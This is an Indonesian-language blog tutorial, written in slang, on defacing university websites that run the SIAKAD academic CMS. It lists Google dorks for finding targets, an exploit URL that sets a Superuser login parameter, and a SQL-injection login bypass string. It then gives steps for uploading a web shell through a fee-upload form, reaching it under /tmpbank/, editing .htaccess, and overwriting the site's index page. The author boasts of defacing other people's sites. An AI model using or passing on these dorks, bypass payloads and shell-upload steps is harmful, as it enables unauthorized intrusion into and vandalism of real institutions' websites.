Siakad CMS

2025-05-12 08:02:30 - zdgtl

Hay gan-sist

Meet again nih dengan admin ganteng, hehe

Di artikel ini kita akan mempelajari ilmu para script kiddies, yaitu Deface Web. Tepatnya, disini lo akan mempelajari Deface web dengan teknik bypass admin pada CMS SIAKAD (Sistem Informasi Akademik)

Oiya, sebelumnya Taqqobalallohu Mina Wa Minkum , Mohon maaf lahir batin guys. Maapin gua kalo gua punya banyaaakkk salah ke lo semua, termasuk para admin web yang web-nya pernah gua anu anu hehe ;) Maapin gua juga kalo gua jarang post, hehe. Ojo lali sundul THR nya ke gua yo wkwk :p

Oke oke, gak usah banyak cincong lagi, langsung otw ke topik pembahasan..



Shortcut : Click Here For Watch Tutorial Video on Youtube



[+] Sesajen :


1. Dork :

/?mnux=login&lgn=frm
siakad
inurl:"?mnux=" intext:siakad
inurl:"?mnux=" intext:akademik
inurl:"?mnux=" intext:sisfo
inurl:"?mnux=" site:id
inurl:"?mnux=" site:com
inurl:"?mnux=" site:net

 NOTE : Pilih salah satu dork nya mbah 



2. Exploit :


/?mnux

ATAU


/?mnux=login&lgn=frm&lid=1&nme=Superuser


3. Bypass :

'=''or'


4. Shell Access :

/tmpbank/your-shell.php



[+] Jampi-jampi :


 1. Seperti biasa, gunakan dork untuk mencari target dengan cara Masukan dork ke mbah google, lalu pilih target lo.

Cuplikan+layar+dari+2016-07-05+09%253A10%253A20.png


 

2. Setelah pilih target, masukkan exploit-nya

Cuplikan+layar+dari+2016-07-05+09%253A13%253A32.png

 

Cuplikan+layar+dari+2016-07-05+09%253A13%253A57.png






3. Lalu bypass page admin-nya.

Cuplikan+layar+dari+2016-07-05+09%253A14%253A47.png

 


4. Kalo lo gak jones, lo bakal masuk ke page admin-nya, kayak gua wkwk B-)

Cuplikan+layar+dari+2016-07-05+09%253A15%253A29.png



5. Lalu pergi ke menu Keuangan > File Biaya Mahasiswa

Cuplikan+layar+dari+2016-07-05+09%253A15%253A42.png



6. Isi form nya asal aja, guys. Terus pilih Upload File dari Bank

Cuplikan+layar+dari+2016-07-05+09%253A16%253A33.png



7. Next, Upload your shell, suckers. Dan tunggu hingga Shell berhasil di upload.

Cuplikan+layar+dari+2016-07-05+09%253A17%253A38.png

 

Cuplikan+layar+dari+2016-07-05+09%253A17%253A47.png

 

Cuplikan+layar+dari+2016-07-05+09%253A17%253A51.png

 

Cuplikan+layar+dari+2016-07-05+09%253A18%253A16.png

 

Cuplikan+layar+dari+2016-07-05+09%253A18%253A21.png

 

Cuplikan+layar+dari+2016-07-05+09%253A19%253A08.png

 

Cuplikan+layar+dari+2016-07-05+09%253A20%253A24.png

 

Cuplikan+layar+dari+2016-07-05+09%253A20%253A55.png



8. Yeayy, Shell had been Uploaded

Cuplikan+layar+dari+2016-07-05+09%253A21%253A35.png

Cuplikan+layar+dari+2016-07-05+09%253A22%253A38.png



9. Lalu pergi ke direktori utama pada situs target. Biasanya terletak di /public_html/ tapi disini gua mendapatkan target dengan direktori utama /var/www/

Cuplikan+layar+dari+2016-07-05+09%253A23%253A06.png

 

 

10.Disitu terlihat permission nya Not Writable. Ini menjadi penghalang oleh para Defacer untuk menebas index aslinya. So, mari kita bermain dengan .htaccess

Cuplikan+layar+dari+2016-07-05+08%253A44%253A17.png

 

pada file .htaccess dibawah ini, terlihat bagwa ExpiresActive dalam keadaan On, maka mati-kan lah, dengan merubah On menjadi Off

Cuplikan+layar+dari+2016-07-05+08%253A45%253A51.png

 

Cuplikan+layar+dari+2016-07-05+08%253A46%253A05.png

 

Cuplikan+layar+dari+2016-07-05+08%253A46%253A12.png

 

Cuplikan+layar+dari+2016-07-05+08%253A46%253A20.png



11. Tahap yang dinantikan oleh para defacer. Yapss, menebas index.


Cuplikan+layar+dari+2016-07-05+08%253A47%253A43.png


Cuplikan+layar+dari+2016-07-05+08%253A48%253A50.png

 

Cuplikan+layar+dari+2016-07-05+08%253A48%253A58.png

 

Cuplikan+layar+dari+2016-07-05+08%253A49%253A01.png

 

Cuplikan+layar+dari+2016-07-05+08%253A50%253A30.png

 

Cuplikan+layar+dari+2016-07-05+08%253A51%253A06.png


 

FINNISH.. Thanks for reading on my Blog.. Dont forget to leave comment 





More Posts

PMA Multiple Check
Mass Copy Files
Wordpress Auto Post via XMLRPC
Bulk post Wordpress Via xmlrpc Menggunakan Python
Extract email addresses from a text file using notepad++